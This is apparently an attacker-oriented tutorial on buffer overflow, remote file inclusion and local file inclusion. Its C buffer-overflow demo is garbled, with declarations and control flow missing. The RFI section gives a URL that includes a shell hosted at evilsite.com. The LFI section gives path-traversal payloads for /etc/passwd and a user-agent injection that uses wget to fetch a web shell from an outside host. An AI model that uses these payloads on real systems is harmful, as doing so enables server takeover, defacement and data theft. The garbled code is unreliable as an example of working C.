Here comes the real part Buffer overflow is the vulnerability when a program tries to write more data in buffer memory than it is capable of thus making it to write in adjacent memories thus over writing the data stored in those adjacent memories.
The extra data can contain some malicious code which can trigger some malicious action. By buffer overflow an attacker can get partial or full control over victim’s machine. Later he can add some
backdoors on the victim’s machine for further
action & can use victim’s system as a bot. It is one of the deadliest attack. Exploitation vary from heap based memory & stack.
Buffer overflow demo Thanks to Passwdatt
/*
This program is a good example of buffer overflow attack that corrupts data (password) without modifying the address of the variable that stores it.
The program accepts user name as input and loads the stored encrypted password into a buffer. When the user enters a password that is longer than 8 characters, it overwrittes the system password. Thus creating a window of opportunity for a hacker to break into the system.
The valid usernames and passwords can be found in the init_list function.
The program uses Caeser Cipher where the shift is 3.
For example a,b,c will be d,e,f.. so on and x,y,z will be a,b,c.
*/
// defines how long the username/password should be. For a unix system, the length is 8.
#define MAXLENGTH 8
// increase this if more users are added to this system.
#define LISTLENGTH 5
/*Structure used to store the list of user names
and their corresponding passwords. More names can be added by increasing the array length.
*/
void init_list(struct usrlst *u);
int get_indx(char *pch, struct usrlst *u);
void encode_passwd(const char *, char *);
/*
// keep the length of the string one greater than the MAXLENGTH to accomodate the '\0' character at the end.
char buffer[4][MAXLENGTH+1];
char *usrname, *usrpasswd, *sys_enc_pass, *usr_enc_pass;
usrname = buffer[0];
usrpasswd = buffer[1];
sys_enc_pass = buffer[2];
usr_enc_pass = buffer[3];
//printf("<%p>,<%p>,<%p>,<%p>\n",&usrname[0],&usrpasswd[0],&sys_enc_pass[0],&usr_enc_pass[0]);
printf("Password table is shown as below:\n");
printf("Username \t\t Password \t Encrypted Password\n");
printf(" joe \t\t\t ilovemsu \t\t loryhpvx\n");
printf(" bob \t\t\t manitoba \t\t pdqlwred\n");
printf(" john \t\t\t inbombay \t\t lperpedb\n");
printf(" marc \t\t\t hiobiwan \t\t klrelzdq\n");
printf(" alice \t\t cometous \t\t frphwrxv\n");
init_list(&usr);
printf("Please enter your username (lowercase): ");
gets(usrname);
if(strlen(usrname)>0)
pass_indx = get_indx(usrname, &usr);
else
printf("You entered an invalid username.\nPlease try again.\nGoodbye!!\n");
if(pass_indx >= 0){
strcpy( sys_enc_pass, usr.passwd[pass_indx] );
//printf("The sys passwd is: %s\n",sys_enc_pass);
printf("Please enter the password for user %s: ", usrname);
ch_tmp='\0';
//putchar(ch_tmp); //uncomment this if you want to echo the password on the screen
putchar('*'); //comment this if you want to see the password instead of *
} i++;
//printf("The password you entered is: %s\n", usrpasswd);
encode_passwd(usrpasswd, usr_enc_pass);
printf("<%s>,<%s>,<%s>,<%s>\n",usrname,usrpasswd,sys_enc_pass,usr_enc_pass);
if( !strcmp( usr_enc_pass, sys_enc_pass ) ){
printf("Thank you, your password has been accepted.\nWelcome!!\n");
} else{
printf("Sorry, your password was not accepted.\nPlease try again.\nGoodbye!!\n");
Encrypt the user entered password and return the caeser cipher back.
The substitution is simply to replace an alphabet with a letter standing three places down the alphabet.
Also note, the replacement alphabets wrap around viz: z->c
*/
void encode_passwd(const char* s, char *r){
int i, ch;
check if the username exists in the database.
if does, get the index of its corresponding password.
return -1 if the username is not found.
*/
int get_indx(char *pch, struct usrlst *u){
int i;
for (i=0; i<LISTLENGTH; i++){
if(!strcmp(pch, u->unames[i]))
printf("The username %s not found in database.\nPlease try again.\nGoodbye!!\n", pch);
return -1;
} }
/*
store all the usernames and passwords in the usrlst structure.
*/
void init_list(struct usrlst *u){
u->unames[0]="joe"; u->passwd[0]="loryhpvx"; //ilovemsu u->unames[1]="bob"; u->passwd[1]="pdqlwred"; //manitoba u->unames[2]="john"; u->passwd[2]="lqerpedb"; //inbombay u->unames[3]="marc"; u->passwd[3]="klrelzdq"; //hiobiwan u->unames[4]="alice"; u->passwd[4]="frphwrxv"; //cometous
}
RFI
It’s not only input validation attacks which can damage a server but believe me RFI can do it also with the same ease. It is a vulnerability which allows an attacker to remotely include files on a server. It is easier than a sql injection. After
uploading a shell an attacker can root the server, deface website’s hosted on it, steal source code of website’s etc.
Demo of RFI
http://vulnerablesite.com/index.php?
page=http://evilsite.com/shell.php
If the site opens an iframe on the current page then the website is vulnerable
Things Needed:
• Shell
• A webhost which will host your shell
• If it automatically adds extension to the file then we must use null byte “%00” (without quotes) to avoid any error
http://vulnerablesite.com/index.php?
• Remote code Execution on a web server
• Code Execution on Client side
• Document Hijacking including Database it is stored o
• Source code theft
• DDos
LFI
LFI or Local File Inclusion is opposite of RFI in LFI file’s on the server are included rather than
remotely including as in RFI. In LFI an attacker can view as well as execute a local file in the server.
After successfully exploiting a lfi vulnerability an attacker can execute remote code n the machine.
In a Unix based Server can get hold of some important files like /etc/passwd , /etc/shadow, /etc/release , /proc/self/eviron etc
Some of the important files which an attacker can get on a windows based machine
\boot.ini , \php.ini , \Program Files\Apache Software Foundation\Apache\conf\logs\access.log , \Program Files\Apache Software
Foundation\Apache\conf\logs\error.log etc;
The Vulnerable URL look like this
http://www.vulnerablesite.com/index.php?
page=../../../../../etc/passwd
or using a null byte if it add file extension automatically
http://www.vulnerablesite.com/index.php?
page=../../../../../etc/passwd%00
(List of system accounts, username & hashes from /etc/passwd)
After finding a vulnerable site an attacker can execute code on the machine using user agent changer software. You can use this User Agent
Changer it has a easy GUI. An attacker changes the User Agent to the Code which he wants to get
executed. In below example attacker enter the following code
<?exec('wget http://www.shellsite.tld/shell.txt -O shell.php');?>
This code will upload a a shell in shell.txt form &
later rename it to shell.php